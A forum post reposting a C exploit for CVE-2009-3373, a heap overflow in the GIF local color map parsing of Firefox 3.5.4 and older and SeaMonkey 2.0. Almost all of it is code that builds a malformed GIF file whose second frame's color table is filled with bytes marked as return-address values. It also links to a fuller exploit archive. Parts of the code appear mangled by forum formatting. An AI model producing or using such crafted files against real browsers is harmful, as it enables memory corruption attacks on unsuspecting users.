Nytro Posted August 20, 2013 Report Posted August 20, 2013 [h=1]Mozilla Firefox 3.5.4 - Local Color Map Exploit[/h]#include <stdio.h>#include <stdlib.h>/* x90c local color map 1day exploit CVE-2009-3373 Firefox local color map 1day exploit (MFSA 2009-56 Firefox local color map parsing heap overflow) Full Exploit: http://www.exploit-db.com/sploits/27699.tgzvulnerable: - Firefox 3.5.4 <= - Firefox 3.0.15 <= - SeaMonkey 2.0 <= x90c*/struct _IMAGE{ char GCT_size; // global color map size char Background; // backcolor( select in global color map entry ) char default_pixel_ratio; // 00 char gct[4][3]; // 4 entries of global color map( 1bit/1pixel )// char app_ext[19]; // application extension 19bytes ( to enable animation ) char gce[2]; // '!' GCE Label = F9 char ext_data; // 04 = 4 bytes of extension data char trans_color_ind; // use transparent color? ( 0/1 ) char ani_delay[2]; // 00 00 ( micro seconds delay in animation ) char trans; // color map entry to apply transparent color ( applied first image ) char terminator1; // 0x00 char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) image put position char canvas_size[4]; // 03 00 05 00 ( 3x5 ) logical canvas size char local_colormap; // 80 use local color map? ( last bottom 3bits are bits per pixel) char lct[4][3]; // local color map ( table ) char LZW_min; // 02 ( LZW data length -1 ) char encoded_image_size;// 03 ( LZW data length ) char image_data[1]; // LZW encoded image data char terminator2; // 0x00} IMAGE;struct _IMAGE1{ char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) char canvas_size[4]; // 03 00 05 00 ( 3x5 ) char local_colormap; // 00 = no local color map char lct[7][3]; // local color map char lcta[1][2]; // char LZW_min; // 08// char encoded_image_size; // 0B ( 11 bytes )// char image_data[9]; // encoded image data //char terminator2; // 0x00} IMAGE1;struct _GIF_HEADER{ char MAGIC[6]; // GIF89a unsigned short canvas_width; // 03 00 unsigned short canvas_height; // 05 00 struct _IMAGE image; struct _IMAGE1 image1; // char trailler; // ; // GIF file trailer} GIF_HEADER;int main(int argc, char *argv[]){ struct _GIF_HEADER gif_header; int i = 0; // (1) first image frame to LZW data, proper dummy ( it's can't put graphic )// char data[3] = "\x84\x8F\x59"; char data[3] = "\x00\x00\x00"; // (2) second image frame to LZW data, backcolor changed by reference local color map char data1[9] = "\x84\x8F\x59\x84\x8F\x59\x84\x8F\x59"; char app_ext[19] = "\x21\xFF\x0B\x4E\x45\x54\x53\x43\x41\x50\x45\x32\x2E\x30\x03\x01\x00\x00\x00"; // animation tag ( not use ) FILE *fp; memset(&gif_header, 0, sizeof(gif_header)); // MAGIC ( GIF87a ) last version - support alpha value(transparency) gif_header.MAGIC[0] = '\x47'; gif_header.MAGIC[1] = '\x49'; gif_header.MAGIC[2] = '\x46'; gif_header.MAGIC[3] = '\x38'; gif_header.MAGIC[4] = '\x39'; gif_header.MAGIC[5] = '\x61'; // LOGICAL CANVAS gif_header.canvas_width = 3; // global canvas width length gif_header.canvas_height = 5; // height length // GLOBAL HEADER ( included global header, if local color map exists, not used global color map ) gif_header.image.GCT_size = '\x81'; // 81 gif_header.image.Background = '\x00'; // global color table #2 ( black ) gif_header.image.default_pixel_ratio = '\x00'; // 00 ( Default pixel aspect ratio ) // gct ( [200][3] ) gif_header.image.gct[0][0] = '\x43'; gif_header.image.gct[0][1] = '\x43'; gif_header.image.gct[0][2] = '\x43'; gif_header.image.gct[1][0] = '\x43'; gif_header.image.gct[1][1] = '\x43'; gif_header.image.gct[1][2] = '\x43'; gif_header.image.gct[2][0] = '\x43'; gif_header.image.gct[2][1] = '\x43'; gif_header.image.gct[2][2] = '\x43'; gif_header.image.gct[3][0] = '\x43'; gif_header.image.gct[3][1] = '\x43'; gif_header.image.gct[3][2] = '\x43'; /* for(i = 0; i < 19; i++) { gif_header.image.app_ext = app_ext; }*/ gif_header.image.gce[0] = '!'; gif_header.image.gce[1] = '\xF9'; gif_header.image.ext_data = '\x04'; gif_header.image.trans_color_ind = '\x00'; // no use transparent color gif_header.image.ani_delay[0] = '\x00'; // C8 = 2 seconds delay ( animation ) gif_header.image.ani_delay[1] = '\x00'; gif_header.image.trans = '\x00'; // no use transparent color ( color map ) gif_header.image.terminator1 = '\x00'; // IMAGE Header gif_header.image.image_desc = ','; gif_header.image.NW_corner[0] = '\x00'; // 0,0 position gif_header.image.NW_corner[1] = '\x00'; gif_header.image.NW_corner[2] = '\x00'; gif_header.image.NW_corner[3] = '\x00'; gif_header.image.canvas_size[0] = '\x03'; // 3 x 5 canvas gif_header.image.canvas_size[1] = '\x00'; gif_header.image.canvas_size[2] = '\x05'; gif_header.image.canvas_size[3] = '\x00'; gif_header.image.local_colormap = 0x80; // use local color map// gif_header.image.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image.local_colormap |= 0x4; // pixel of local color map //gif_header.image.local_colormap |= 0x2; // 2 bits. gif_header.image.local_colormap |= 0x1; // bits per pixel. ( black/white ) gif_header.image.lct[0][0] = '\x42'; // R ( red ) gif_header.image.lct[0][1] = '\x42'; gif_header.image.lct[0][2] = '\x42'; gif_header.image.lct[1][0] = '\x42'; gif_header.image.lct[1][1] = '\x42'; // G ( green ) gif_header.image.lct[1][2] = '\x42'; // b ( blue ) gif_header.image.lct[2][0] = '\x42'; gif_header.image.lct[2][1] = '\x42'; gif_header.image.lct[2][2] = '\x42'; gif_header.image.lct[3][0] = '\x42'; gif_header.image.lct[3][1] = '\x42'; gif_header.image.lct[3][2] = '\x42'; // RASTER DATA gif_header.image.LZW_min = '\x00'; // total encode data - 1 gif_header.image.encoded_image_size = '\x01'; // 255 bytes // encoded data for(i = 0; i < 1; i++) { gif_header.image.image_data = 0xFF; } // RASTER DATA EOF gif_header.image.terminator2 = '\x00'; // -------------------------------------------------- // ------------- IMAGE1 ----------------------------- gif_header.image1.image_desc = ','; gif_header.image1.NW_corner[0] = '\x00'; // (0, 0) gif_header.image1.NW_corner[1] = '\x00'; gif_header.image1.NW_corner[2] = '\x00'; gif_header.image1.NW_corner[3] = '\x00'; gif_header.image1.canvas_size[0] = '\x03'; // 3 x 5 gif_header.image1.canvas_size[1] = '\x00'; gif_header.image1.canvas_size[2] = '\x05'; gif_header.image1.canvas_size[3] = '\x00'; gif_header.image1.local_colormap = 0x80; // use local color map// gif_header.image1.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image1.local_colormap |= 0x4; // pixel of local color map 4 pixel gif_header.image1.local_colormap |= 0x2; //gif_header.image1.local_colormap |= 0x1; // 1bit per pixel. // below values are will used as return addr for(i = 0; i < 7; i++) // second image frame's local color map entry length is 8 { gif_header.image1.lct[0] = '\x0c'; // (RET & 0x00FF0000) gif_header.image1.lct[1] = '\x0c'; // (RET & 0xFF00FF00) gif_header.image1.lct[2] = '\x0c'; // (RET & 0X000000FF) } gif_header.image1.lcta[0][0] = '\x0c'; gif_header.image1.lcta[0][1] = '\x0c'; //} // RASTER DATA //gif_header.image1.LZW_min = 0x00;//'\x05'; //gif_header.image1.encoded_image_size = 0x00;//'\x06';*/ // encoded data/* for(i = 0; i < 9; i++) { gif_header.image1.image_data = 0xFF;//data1; }*/ // RASTER DATA // second image frame's last byte ignored ( null terminatee, GIF total trailer ) //gif_header.image1.terminator2 = '\x00'; //gif_header.trailler = ';'; // -------------------------------------------------- fp = fopen("a.gif", "wb"); printf("%d\n", sizeof(struct _GIF_HEADER)); fwrite(&gif_header, sizeof(struct _GIF_HEADER) - 1, 1, fp); fclose(fp); system("xxd ./a.gif");}Sursa: Mozilla Firefox 3.5.4 - Local Color Map Exploit Quote